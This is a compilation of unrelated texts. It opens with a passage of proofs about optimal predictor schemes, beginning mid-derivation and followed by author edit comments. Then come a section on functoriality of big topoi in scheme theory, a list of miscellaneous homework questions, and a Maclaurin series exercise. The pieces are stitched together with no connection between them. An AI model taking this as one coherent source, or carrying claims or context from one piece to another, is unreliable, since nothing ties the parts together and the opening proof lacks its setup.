$Q^{kj}_t(x,y,b^{kj}_t):= \begin{cases} Q^{kj}(x,y_{\leq s(k,j)},b^{kj}) & \text{if } w^{kj}(x,y_{\leq q(k,j)},u^{kj}) \geq \alpha^{kj}(t) \\ P^{kj}(x,y_{\leq r(k,j)},a^{kj}) & \text{if } w^{kj}(x,y_{\leq q(k,j)},u^{kj}) < \alpha^{kj}(t) \end{cases}$
$$\hat{Q}_t$$ satisfies bounds on runtime and advice size uniform in $$t$$. Therefore, Lemma B.1 implies that there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{r(k,j)+s(k,j)}}[(Q^{kj}_t(x,y,b^{kj}_t)-f(x))^2] + \delta(k, j)$
$E_{\mu^k \times U^{r(k,j)+s(k,j)}}[(P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}_t(x,y,b^{kj}_t)-f(x))^2] \leq \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[\theta(w^{kj}(x,y,u^{kj})-\alpha^{kj}(t))((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[\int_0^M\theta(w^{kj}(x,y,u^{kj})-\alpha^{kj}(t))\,dt\,((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq M \delta(k, j)$
$E_{\mu^k \times U^{q(k,j)}}[w^{kj}(x,y,u^{kj})((P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2-(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2)] \leq M \delta(k, j) + h(k,j)^{-1}$
In the following proofs we will use shorthand notation that omits most of the symbols that are clear from the context. That is, we will write $$P$$ for $$P^{kj}(x,y,a^{kj})$$, $$f$$ for $$f(x)$$, $$E[\ldots]$$ for $$E_{\mu^k \times U^{r(k,j)}}[\ldots]$$, etc.
# Proof of Theorem A.1
Define $$w: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} \{0,1\}$$ and $$u: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ by
$w:=\theta(P-p)\theta(q-P)$
We have
$\phi = \frac{E[w(f-P)]}{E[w]}$
Define $$\psi$$ to be $$\phi$$ truncated to the first significant binary digit. Denote $$I \subseteq {\mathbb{N}}^2$$ the set of $$(k,j)$$ for which $${\lvert \phi_{kj} \rvert} > h(k,j)^{-1}$$. Consider $$(Q,s,b)$$ a $$(poly,log)$$-predictor scheme satisfying
$\forall (k,j) \in I: Q^{kj}=\eta(P^{kj}+\psi_{kj})$
Such $$Q$$ exists since for $$(k,j) \in I$$, $$\psi_{kj}$$ has binary notation of logarithmically bounded size.
Applying Lemma B.2 we get
$\forall (k,j) \in I: E[w^{kj}(P^{kj}-f)^2] \leq E[w^{kj}(Q^{kj}-f)^2] + \delta(k,j)$
for $$\delta \in \Delta$$.
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(Q^{kj}-f)^2)] \leq \delta(k,j)$
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(\eta(P^{kj}+\psi_{kj})-f)^2)] \leq \delta(k,j)$
Obviously $$(\eta(P^{kj}+\psi_{kj})-f)^2 \leq (P^{kj}+\psi_{kj}-f)^2$$, therefore
$\forall (k,j) \in I: E[w^{kj}((P^{kj}-f)^2-(P^{kj}+\psi_{kj}-f)^2)] \leq \delta(k,j)$
$\forall (k,j) \in I: \psi_{kj} E[w^{kj}(2(f-P^{kj})-\psi_{kj})] \leq \delta(k,j)$
The expression on the left hand side is a quadratic polynomial in $$\psi_{kj}$$ which attains its maximum at $$\phi_{kj}$$ and has roots at $$0$$ and $$2\phi_{kj}$$. $$\psi_{kj}$$ is between $$0$$ and $$\phi_{kj}$$, but not closer to $$0$$ than $$\frac{\phi_{kj}}{2}$$. Therefore, the inequality is preserved if we replace $$\psi_{kj}$$ by $$\frac{\phi_{kj}}{2}$$.
$\forall (k,j) \in I: \frac{\phi_{kj}}{2}E[w^{kj}(2(f-P^{kj})-\frac{\phi_{kj}}{2})] \leq \delta(k,j)$
Substituting the equation for $$\phi_{kj}$$ we get
$\forall (k,j) \in I: \frac{1}{2}\frac{E[w^{kj}(f-P^{kj})]}{E[w^{kj}]}E[w^{kj}(2(f-P^{kj})-\frac{1}{2}\frac{E[w^{kj}(f-P^{kj})]}{E[w^{kj}]})] \leq \delta(k,j)$
$\forall (k,j) \in I: \frac{3}{4}\frac{E[w^{kj}(f-P^{kj})]^2}{E[w^{kj}]} \leq \delta(k,j)$
$\forall (k,j) \in I: \frac{3}{4}E[w^{kj}]\phi_{kj}^2 \leq \delta(k,j)$
$\forall (k,j) \in I: \phi_{kj}^2 \leq \frac{4}{3}E[w^{kj}]^{-1}\delta(k,j)$
$\forall (k,j) \in I: \phi_{kj}^2 \leq \frac{4}{3}(\mu^k \times U^{r(k,j)})\{p_{kj} \leq P^{kj} \leq q_{kj}\}^{-1}\delta(k,j)$
Thus for all $$k,j \in {\mathbb{N}}$$ we have
$|\phi_{kj}| \leq h(k,j)^{-1} + \sqrt{\frac{4}{3}(\mu^k \times U^{r(k,j)})\{p_{kj} \leq P^{kj} \leq q_{kj}\}^{-1}\delta(k,j)}$
In particular, $$|\phi| \in \Delta$$.
# Lemma B.3
Consider $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$. Then there are $$c_1,c_2 \in {\mathbb{R}}$$ and a $$\Delta$$-moderate function $$\delta: {\mathbb{N}}^4 \rightarrow [0,1]$$ s.t. for any $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {\mathbb{Q}}$$
$|E_{\mu^k \times U^s \times U^{r(k,j)}}[Q(P^{kj}-f)]| \leq (c_1 + c_2 E_{\mu^k \times U^s}[Q^2]) \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
Conversely, consider $$M \in {\mathbb{Q}}$$ and $$(P,r,a)$$ a $${\mathbb{Q}}\cap [-M,+M]$$-valued $$(poly,log)$$-bischeme. Suppose that for any $${\mathbb{Q}}\cap [-M-1,+M]$$-valued $$(poly,log)$$-bischeme $$(Q,s,b)$$ we have $$|E[Q(P-f)]| \in \Delta$$.
Define $$\tilde{P}$$ to be s.t. computing $$\tilde{P}^{kj}$$ is equivalent to computing $$\eta(P^{kj})$$ rounded to $$h(k,j)$$ digits after the binary point, where $$2^{-h} \in \Delta$$. Then, $$\tilde{P}$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$.
# Proof of Lemma B.3
Assume $$P$$ is a $$\Delta(poly,log)$$-optimal predictor scheme. Consider $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {\mathbb{Q}}$$. Define $$t := \sigma 2^{-a}$$ where $$\sigma \in \{ \pm 1 \}$$ and $$a \in {\mathbb{N}}$$. Define $$R: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$ to compute $$\eta(P + tQ)$$ rounded within error $$2^{-h}$$. By Lemma B.1
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}-f)^2] \leq E_{\mu^k \times U^{r(k,j)} \times U^s}[(R-f)^2] + \tilde{\delta}(k,j,T_R^\mu(k,r(k,j)+s),2^{|R|})$
where $$\tilde{\delta}$$ is $$\Delta$$-moderate. It follows that
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}-f)^2] \leq E_{\mu^k \times U^{r(k,j)} \times U^s}[(\eta(P + tQ)-f)^2] + \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
where $$\delta$$ is $$\Delta$$-moderate ($$a$$ doesn’t enter the error bound because of the $$2^{-h}$$ rounding). As in the proof of Theorem A.1, $$\eta$$ can be dropped.
$E_{\mu^k \times U^{r(k,j)} \times U^s}[(P^{kj}-f)^2 - (P^{kj}+tQ-f)^2] \leq \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
The expression on the left hand side is a quadratic polynomial in $$t$$. Explicitly:
$-E_{\mu^k \times U^s}[Q^2]t^2 - 2E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]t \leq \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
Moving $$E_{\mu^k \times U^s}[Q^2]t^2$$ to the right hand side and dividing both sides by $$2|t|=2^{1-a}$$ we get
$-E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]\sigma \leq 2^{a-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|}) + E_{\mu^k \times U^s}[Q^2] 2^{-a-1}$
$|E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]| \leq 2^{a-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|}) + E_{\mu^k \times U^s}[Q^2] 2^{-a-1}$
Take $$a:=-\frac{1}{2}\log \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})+\phi(k,j)$$ where $$\phi(k,j) \in [-\frac{1}{2}, +\frac{1}{2}]$$ is the rounding error. We get
$|E_{\mu^k \times U^{r(k,j)} \times U^s}[Q(P^{kj}-f)]| \leq 2^{\phi(k,j)-1} \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})^{\frac{1}{2}} + E_{\mu^k \times U^s}[Q^2] 2^{-\phi(k,j)-1}\delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})^{\frac{1}{2}}$
Conversely, assume that for any $${\mathbb{Q}}\cap [-M-1,+M]$$-valued $$(poly,log)$$-bischeme $$(R,t,c)$$
$|E[R(P-f)]| \leq \delta$
Consider $$(Q,s,b)$$ a $$(poly,log)$$-predictor scheme. We have
$E[(Q - f)^2] = E[(Q - P + P - f)^2]$
$E[(Q - f)^2] = E[(Q - P)^2] + E[(P - f)^2] + 2E[(Q - P)(P - f)]$
$2E[(P - Q)(P - f)] = E[(P - f)^2] - E[(Q - f)^2] + E[(Q - P)^2]$
Taking $$R$$ to be $$P - Q$$ we get
$E[(P - f)^2] - E[(Q-f)^2] + E[(Q-P)^2] \leq \delta$
where $$\delta \in \Delta$$. Noting that $$E[(Q - P)^2] \geq 0$$ and $$(\eta(P) - f)^2 \leq (P - f)^2$$ we get
$E[(\eta(P) - f)^2] - E[(Q - f)^2] \leq \delta$
Observing that $$\tilde{P}-\eta(P)$$ is bounded by a function in $$\Delta$$, we get the desired result.
Theorems A.2 and A.3 follow trivially from Lemma B.3 and we omit the proofs.
# Proof of Theorem A.4
We have
$P(x_1,x_2)-(f_1 \times f_2)(x_1,x_2) = (P_1(x_1)- f_1(x_1))f_2(x_2) + P_1(x_1)(P_2(x_2)-f_2(x_2))$
Therefore, for any $${\mathbb{Q}}\cap [-1,+1]$$-valued $$(poly,log)$$-bischeme $$(Q,s,b)$$
$|E[Q(P-f_1 \times f_2)]| \leq |E[Q(x_1,x_2)(P_1(x_1)-f_1(x_1))f_2(x_2)]| + |E[Q(x_1,x_2)P_1(x_1)(P_2(x_2)-f_2(x_2))]|$
By Lemma B.3, it is sufficient to show an appropriate bound for each of the terms on the right hand side. Suppose $$(S_2,F_2,r^S_2,a^S_2)$$ is a $$\Delta^1(log)$$-generator for $$(f_2, \mu_2)$$. For the first term, we have
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)(P^{kj}_1(x_1)-f_1(x_1))f_2(x_2)]| \leq |E_{\mu_1^k \times U^{r^S_2(k)} \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,S^k_2)(P^{kj}_1(x_1)-f_1(x_1))F^k_2]| + \delta^1_2(k)$
where $$\delta^1_2 \in \Delta^1$$. Applying Lemma B.3 for $$P_1$$, we get
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)(P^{kj}_1(x_1)-f_1(x_1))f_2(x_2)]| \leq \delta_1(k,j) + \delta^1_2(k)$
where $$\delta_1 \in \Delta$$.
Suppose $$(S_1,r^S_1,a^S_1)$$ is a $$\Delta^1(log)$$-sampler for $$\mu_1$$. For the second term, we have
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)P_1(x_1)(P^{kj}_2(x_2)-f_2(x_2))]| \leq |E_{U^{r^S_1(k)} \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(S^k_1,x_2)P_1(S^k_1)(P^{kj}_2(x_2)-f_2(x_2))]| + \delta^1_1(k)$
where $$\delta^1_1 \in \Delta^1$$. Applying Lemma B.3 for $$P_2$$, we get
$|E_{\mu_1^k \times \mu_2^k \times U^{s(k,j)+r_1(k,j)}}[Q^{kj}(x_1,x_2)P_1(x_1)(P^{kj}_2(x_2)-f_2(x_2))]| \leq \delta_2(k,j) + \delta^1_1(k)$
where $$\delta_2 \in \Delta$$. Again, we obtain the required bound.
# Proposition C.1
Consider a polynomial $$q: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$. There is a function $$\lambda_q: {\mathbb{N}}^3 \rightarrow [0,1]$$ s.t.
1. $\forall k,j \in {\mathbb{N}}: \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) = 1$
2. For any function $$\epsilon: {\mathbb{N}}^2 \rightarrow [0,1]$$ we have
$\epsilon(k,j) - \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) \, \epsilon(k,q(k,j)+i) \in \Delta_{avg}^2$
# Proof of Proposition C.1
Given functions $$q_1,q_2: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$q_1(k,j) \geq q_2(k,j)$$ for $$k,j \gg 0$$, the proposition for $$q_1$$ implies the proposition for $$q_2$$ by setting
$\lambda_{q_2}(k,j,i):=\begin{cases}\lambda_{q_1}(k,j,i-q_1(k,j)+q_2(k,j)) & \text{if } i-q_1(k,j)+q_2(k,j) \geq 0 \\ 0 & \text{if } i-q_1(k,j)+q_2(k,j) < 0 \end{cases}$
Therefore, it is enough to prove the proposition for functions of the form $$q(k,j)=j^{m+\frac{n \log k}{\log 3}}$$ for $$m > 0$$.
Consider $$F: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ s.t.
${\lim_{k \rightarrow \infty}{\frac{\log \log k}{\log \log F(k)}}} = 0$
Observe that
${\lim_{k \rightarrow \infty}{\frac{\log (m+\frac{n \log k}{\log 3})}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{3^{m+\frac{n \log k}{\log 3}}} d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Since $$\epsilon$$ takes values in $$[0,1]$$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{3^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Similarly
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=F(k)}^{F(k)^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
The last two equations imply that
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x) - \int\limits_{x=3^{m+\frac{n \log k}{\log 3}}}^{F(k)^{m+\frac{n \log k}{\log 3}}} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Raising $$x$$ to a power is equivalent to adding a constant to $$\log \log x$$, therefore
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x \rfloor}) d(\log \log x) - \int\limits_{x=3}^{F(k)} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} (\epsilon(k,{\lfloor x \rfloor})-\epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor})) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
Since $${\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor} \geq {\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}$$ we can choose $$\lambda_q$$ satisfying condition (i) so that
$\int\limits_{x=j}^{j+1} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log\log x) = (\log\log(j+1)-\log\log j) \sum_i \lambda_q(k,j,i) \, \epsilon(k,j^{m+\frac{n \log k}{\log 3}}+i)$
It follows that
$\int\limits_{x=j}^{j+1} \epsilon(k,{\lfloor x^{m+\frac{n \log k}{\log 3}} \rfloor}) d(\log\log x) = \int\limits_{x=j}^{j+1} \sum_i \lambda_q(k,{\lfloor x \rfloor},i) \, \epsilon(k,{\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}+i) d(\log\log x)$
${\lim_{k \rightarrow \infty}{\frac{\int\limits_{x=3}^{F(k)} (\epsilon(k,{\lfloor x \rfloor})-\sum_i \lambda_q(k,{\lfloor x \rfloor},i) \, \epsilon(k,{\lfloor x \rfloor}^{m+\frac{n \log k}{\log 3}}+i)) d(\log \log x)}{\log \log F(k) - \log \log 3}}} = 0$
${\lim_{k \rightarrow \infty}{\frac{\sum_{j=3}^{F(k)-1} (\log\log(j+1)-\log\log j)(\epsilon(k,j)-\sum_i \lambda_q(k,j,i) \, \epsilon(k,j^{m+\frac{n \log k}{\log 3}}+i))}{\log \log F(k) - \log \log 3}}} = 0$
$\epsilon(k,j) - \sum_{i \in {\mathbb{N}}} \lambda_q(k,j,i) \, \epsilon(k,q(k,j)+i) \in \Delta_{avg}^2$
# Lemma C.1
Consider $$(f, \mu)$$ a distributional estimation problem, $$(P,r,a)$$, $$(Q,s,b)$$ $$(poly,log)$$-predictor schemes. Suppose $$p: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ a polynomial and $$\delta \in \Delta_{avg}^2$$ are s.t.
$\forall i,k,j \in {\mathbb{N}}: E[(P^{k,p(k,j)+i}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta(k,j)$
Then $$\exists \delta' \in \Delta_{avg}^2$$ s.t.
$E[(P^{kj}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta'(k,j)$
# Proof of Lemma C.1
By Proposition C.1 we have
$\tilde{\delta}(k,j) := E[(P^{kj}-f)^2] - \sum_i \lambda_p(k,j,i) E[(P^{k,p(k,j)+i}-f)^2] \in \Delta_{avg}^2$
$E[(P^{kj}-f)^2] = \sum_i \lambda_p(k,j,i) E[(P^{k,p(k,j)+i}-f)^2] + \tilde{\delta}(k,j)$
$E[(P^{kj}-f)^2] \leq \sum_i \lambda_p(k,j,i) (E[(Q^{kj}-f)^2] + \delta(k,j)) + \tilde{\delta}(k,j)$
$E[(P^{kj}-f)^2] \leq E[(Q^{kj}-f)^2] + \delta(k,j) + \tilde{\delta}(k,j)$
# Proof of Theorem 1
Define $$\epsilon(k,j)$$ by
$\epsilon(k,j) := E_{\mu^k \times U^j}[(\Upsilon^{kj}(x,y,\upsilon_{f,\mu}^{kj})-f(x))^2]$
It is easily seen that
$\epsilon(k,j) \leq \min_{\substack{|Q| \leq \log j \\ T_Q^{\mu}(k,j) \leq j}} E_{\mu^k \times U^j}[(Q(x,y)-f(x))^2]$
Therefore, there is a polynomial $$p: {\mathbb{N}}^3 \rightarrow {\mathbb{N}}$$ s.t. for any $$(poly,log)$$-predictor scheme $$(Q,s,b)$$
$\forall i,j,k \in {\mathbb{N}}: \epsilon(k,p(s(k,j),T_{Q^{kj}}^{\mu}(k,s(k,j)),2^{|Q|+|b^{kj}|})+i) \leq E_{\mu^k \times U^{s(k,j)}}[(Q^{kj}-f)^2]$
Applying Lemma C.1, we get the desired result.
# Proof of Theorem 2
Consider $$(P,r,a)$$ a $$(poly,log)$$-predictor scheme. Choose $$p: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ a polynomial s.t. evaluating $$\Lambda[G]^{k,p(k,j)}$$ involves running $$P^{kj}$$ until it halts “naturally” (such $$p$$ exists because $$P$$ runs in at most polynomial time and has at most logarithmic advice). Given $$i,j,k \in {\mathbb{N}}$$, consider the execution of $$\Lambda[G]^{k,p(k,j)+i}$$. The standard deviation of $$\epsilon(P^{kj})$$ with respect to the internal coin tosses of $$\Lambda$$ is at most $$((p(k,j)+i)k)^{-\frac{1}{2}}$$. The expectation value is $$E[(P^{kj}-f)^2]+\gamma_P$$ where $$|\gamma_P| \leq \delta(k)$$ for $$\delta \in \Delta_0^1$$ which doesn’t depend on $$i,k,j,P$$. By Chebyshev’s inequality,
$Pr[\epsilon(P^{kj}) \geq E[(P^{kj}-f)^2] + \delta(k) + ((p(k,j)+i)k)^{-\frac{1}{4}}] \leq ((p(k,j)+i)k)^{-\frac{1}{2}}$
Hence
$Pr[\epsilon(Q^*) \geq E[(P^{kj}-f)^2] + \delta(k) + ((p(k,j)+i)k)^{-\frac{1}{4}}] \leq ((p(k,j)+i)k)^{-\frac{1}{2}}$
The standard deviation of $$\epsilon(Q)$$ for any $$Q$$ is also at most $$((p(k,j)+i)k)^{-\frac{1}{2}}$$. The expectation value is $$E[(ev^{p(k,j)+i}(Q)-f)^2]+\gamma_Q$$ where $$|\gamma_Q| \leq \delta(k)$$. Therefore
$Pr[\exists Q < p(k,j)+i: \epsilon(Q) \leq E[(ev^{p(k,j)+i}(Q)-f)^2] - \delta(k) - k^{-\frac{1}{4}}] \leq (p(k,j)+i)(p(k,j)+i)^{-1}k^{-\frac{1}{2}} = k^{-\frac{1}{2}}$
The extra $$p(k,j)+i$$ factor comes from summing probabilities over $$p(k,j)+i$$ programs. Combining we get
$Pr[E[(ev^{p(k,j)+i}(Q^*)-f)^2] \geq E[(P^{kj}-f)^2] + 2\delta(k) + ((p(k,j)+i)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}}] \leq ((p(k,j)+i)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
$E[(\Lambda[G]^{k,p(k,j)+i} - f)^2] \leq E[(P^{kj}-f)^2] + 2\delta(k) + ((p(k,j)+i)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}} + ((p(k,j)+i)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
$E[(\Lambda[G]^{k,p(k,j)+i} - f)^2] \leq E[(P^{kj}-f)^2]+ 2\delta(k) + (p(k,j)^{-\frac{1}{4}} + 1) k^{-\frac{1}{4}} + (p(k,j)^{-\frac{1}{2}} + 1) k^{-\frac{1}{2}}$
Applying Lemma C.1 we get the desired result.
Comment by Vadim Kosoy (EDIT): Corrected Example 5.2 and added Note 2 (previous Note 2 renamed to Note 3).
Comment by Vadim Kosoy (EDIT): Deleted examples of generatable problems since they are wrong. They are in fact examples of a weaker notion which I think also admits uniform OPS, but this should be explored elsewhere.
|
## 59.37 Functoriality of big topoi
Given a morphism of schemes $f : X \to Y$ there are a whole host of morphisms of topoi associated to $f$, see Topologies, Section 34.11 for a list. Perhaps the most used ones are the morphisms of topoi
$f_{big} = f_{big, \tau } : \mathop{\mathit{Sh}}\nolimits ((\mathit{Sch}/X)_\tau ) \longrightarrow \mathop{\mathit{Sh}}\nolimits ((\mathit{Sch}/Y)_\tau )$
where $\tau \in \{ Zariski, {\acute{e}tale}, smooth, syntomic, fppf\}$. These each correspond to a continuous functor
$(\mathit{Sch}/Y)_\tau \longrightarrow (\mathit{Sch}/X)_\tau , \quad V/Y \longmapsto X \times _ Y V/X$
which preserves final objects, fibre products and coverings, and hence defines a morphism of sites
$f_{big} : (\mathit{Sch}/X)_\tau \longrightarrow (\mathit{Sch}/Y)_\tau .$
See Topologies, Sections 34.3, 34.4, 34.5, 34.6, and 34.7. In particular, pushforward along $f_{big}$ is given by the rule
$(f_{big, *}\mathcal{F})(V/Y) = \mathcal{F}(X \times _ Y V/X)$
It turns out that these morphisms of topoi have an inverse image functor $f_{big}^{-1}$ which is very easy to describe. Namely, we have
$(f_{big}^{-1}\mathcal{G})(U/X) = \mathcal{G}(U/Y)$
where the structure morphism of $U/Y$ is the composition of the structure morphism $U \to X$ with $f$, see Topologies, Lemmas 34.3.16, 34.4.16, 34.5.10, 34.6.10, and 34.7.12.
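For instance (a sanity check added here, not part of the cited lemmas): if $\mathcal{G} = h_W$ is the sheaf represented by some $W/Y$, the formula above gives $(f_{big}^{-1}h_W)(U/X) = \mathop{\mathrm{Mor}}\nolimits_Y(U, W) = \mathop{\mathrm{Mor}}\nolimits_X(U, X \times _ Y W)$, the second equality by the universal property of the fibre product; in other words, $f_{big}^{-1}h_W = h_{X \times _ Y W}$.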
|
# If we assigned three people to work with you on a complex project containing 75 tasks that you were responsible for, how would you organize this project?
### Salt and sugar do not appear to have a fixed shape. Why do we call them solids?
### Why is society needed? Write your opinion.
### 135 times 25, please
### (Poem: "Musée des Beaux Arts") Which of the following best describes the theme of the poem above? No one's life matters. Tragedy is everywhere. The gods are cruel. Life goes on.
### Sunita carries out an experiment to investigate diffusion. She uses water and a food dye to find out how the volume of water used affects the time the dye takes to spread evenly through the water. Her prediction is that the more water she uses, the longer the time needed for the dye to spread through it. Which variable will she change?
### Describe how the ancestors of whales moved from the land to the sea.
### Which of the following is an example of a biotic factor? A. Temperature B. Humidity C. Tree D. Air
### 2. Which two organizations were formed to defend against possible communist aggression? a. UN, NATO b. NATO, SEATO c. SEATO, Warsaw Pact d. Warsaw Pact, League of Nations
### What are 4 examples of problems that progressives wanted to fix? 1. 2. 3. 4.
### 1. Libby is calculating her net worth. Her assets total $87,545 and her liabilities are $32,158. What is the value of Libby's net worth?
### Mary decided that she wanted to experiment with the color of her white roses. She placed four roses in four different vases and put a different color dye in each vase. The next day she checked each vase and noticed that the white petals had turned the color of the dye placed in the vase. What two properties of water work together to get the colored dye up to the flower petals?
### A publisher reports that 47% of their readers own a personal computer. A marketing executive wants to test the claim that the percentage is actually different from the reported percentage. A random sample of 280 found that 43% of the readers owned a personal computer. Make the decision to reject or fail to reject the null hypothesis at the 0.01 level.
### What is the value of x in this figure? $28\sqrt{2}$, $28$, $14\sqrt{3}$, $28\sqrt{3}$. A right triangle with one of the acute angles labeled 30 degrees. The hypotenuse is labeled x. The leg across from the 30 degree angle is labeled 14.
### If you only knew the radius of a circle, which of these formulas can be used to find the circumference of the circle?
### Explain how to make this an expression: 176.3 - 15.75
### In the poem "Barbara Frietchie," what "flapped in the morning wind"? The clustered spires; the peach tree; the flag; the window-sill
### I need help urgently with this. I'm so confused and need help. Social paragraph: one introductory sentence; one sentence on Black Codes; one sentence on the KKK; separation of races or Jim Crow laws. Conclusion sentence connecting these laws to the 13th and 14th amendments. Political paragraph: introductory sentence; one sentence explaining poll taxes, one sentence explaining literacy tests, one explaining grandfather clauses. One summary sentence to conclude the paragraph CONNECTING voting restrict...
|
# Calculus: Other Calculus Problems – #27843
Question: Find the first four terms of the MacLaurin series for each of the functions given below
a- $${{e}^{x}}\sin x$$
b- $$\frac{\ln \left( 1+x \right)}{1-x}$$
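A worked sketch (added here, not part of the original problem statement). Multiplying the standard expansions gives

$${{e}^{x}}\sin x=\left( 1+x+\frac{{{x}^{2}}}{2}+\frac{{{x}^{3}}}{6}+\cdots \right)\left( x-\frac{{{x}^{3}}}{6}+\cdots \right)=x+{{x}^{2}}+\frac{{{x}^{3}}}{3}-\frac{{{x}^{5}}}{30}+\cdots$$

(the $${{x}^{4}}$$ coefficient vanishes), and

$$\frac{\ln \left( 1+x \right)}{1-x}=\left( x-\frac{{{x}^{2}}}{2}+\frac{{{x}^{3}}}{3}-\frac{{{x}^{4}}}{4}+\cdots \right)\left( 1+x+{{x}^{2}}+{{x}^{3}}+\cdots \right)=x+\frac{{{x}^{2}}}{2}+\frac{5{{x}^{3}}}{6}+\frac{7{{x}^{4}}}{12}+\cdots$$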